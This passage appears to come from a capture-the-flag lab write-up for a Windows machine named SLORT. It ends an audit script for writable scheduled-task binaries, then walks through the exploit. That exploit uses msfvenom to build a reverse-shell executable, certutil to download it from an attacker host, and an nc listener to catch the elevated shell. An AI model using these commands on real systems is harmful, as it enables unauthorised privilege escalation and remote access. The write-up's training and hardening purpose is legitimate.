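    '"SLORT","\\Backup","C:\\Backup\\TFTP.exe -i 10.0.0.5 -a put -f C:\\Backup\\backup.txt","SLORT\\Administrator","One Time Only, Minute","0:05:00"\n'
    '"SLORT","\\Microsoft\\Windows\\Defrag\\ScheduledDefrag","C:\\Windows\\system32\\defrag.exe -c -h","SYSTEM","Weekly","Disabled"\n'
    '"SLORT","\\Microsoft\\Windows\\WinSAT\\WinSAT","COM handler","SYSTEM","Weekly","Disabled"\n'
)
# Constructed sample: `icacls <file>` output for the two executables above.
SAMPLE_ICACLS = {
    "C:\\Backup\\TFTP.exe": (
        "C:\\Backup\\TFTP.exe BUILTIN\\Administrators:(I)(F)\n"
        "                   NT AUTHORITY\\SYSTEM:(I)(F)\n"
        "                   BUILTIN\\Users:(I)(M)\n\n"
        "Successfully processed 1 files; Failed processing 0 files\n"),
    "C:\\Windows\\system32\\defrag.exe": (
        "C:\\Windows\\system32\\defrag.exe NT SERVICE\\TrustedInstaller:(F)\n"
        "                                 NT AUTHORITY\\SYSTEM:(RX)\n"
        "                                 BUILTIN\\Administrators:(RX)\n"
        "                                 BUILTIN\\Users:(RX)\n\n"
        "Successfully processed 1 files; Failed processing 0 files\n"),
}

if __name__ == "__main__":
    for finding in audit_tasks(SAMPLE_SCHTASKS, SAMPLE_ICACLS):
        print(finding)
```

Run against the constructed data it reports only the Backup task: its action runs as an administrator every five minutes while BUILTIN\Users hold Modify on the binary, which is exactly the combination a hardening review should refuse (the executable of any task running under a privileged account belongs in a directory where only administrators can write).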

Creating the malicious binary

Since we have permission to modify the file, we create a file called TFTP.exe with msfvenom that contains our reverse shell, and then we swap it for the one on the system.

msfvenom -p windows/x64/powershell_reverse_tcp LHOST=192.168.45.5 LPORT=80 -f exe -a x64 --platform windows -b '\x00' -e x64/xor_dynamic -o TFTP.exe

Replacing and uploading the malicious binary

On the victim machine we rename TFTP.exe to TFTP.exe.bak so as not to delete it, and download our malicious EXE.

move TFTP.exe TFTP.exe.bak
certutil.exe -urlcache -split -f "http://192.168.45.5/TFTP.exe"

Remember to stop the Python HTTP server we used to serve the EXE, and start a listener on port 80 to catch our shell:

sudo rlwrap nc -lnvp 80

We wait 5 minutes and... PWNED!

type C:\Users\rupert\Desktop\local.txt
type C:\Users\Administrator\Desktop\proof.txt
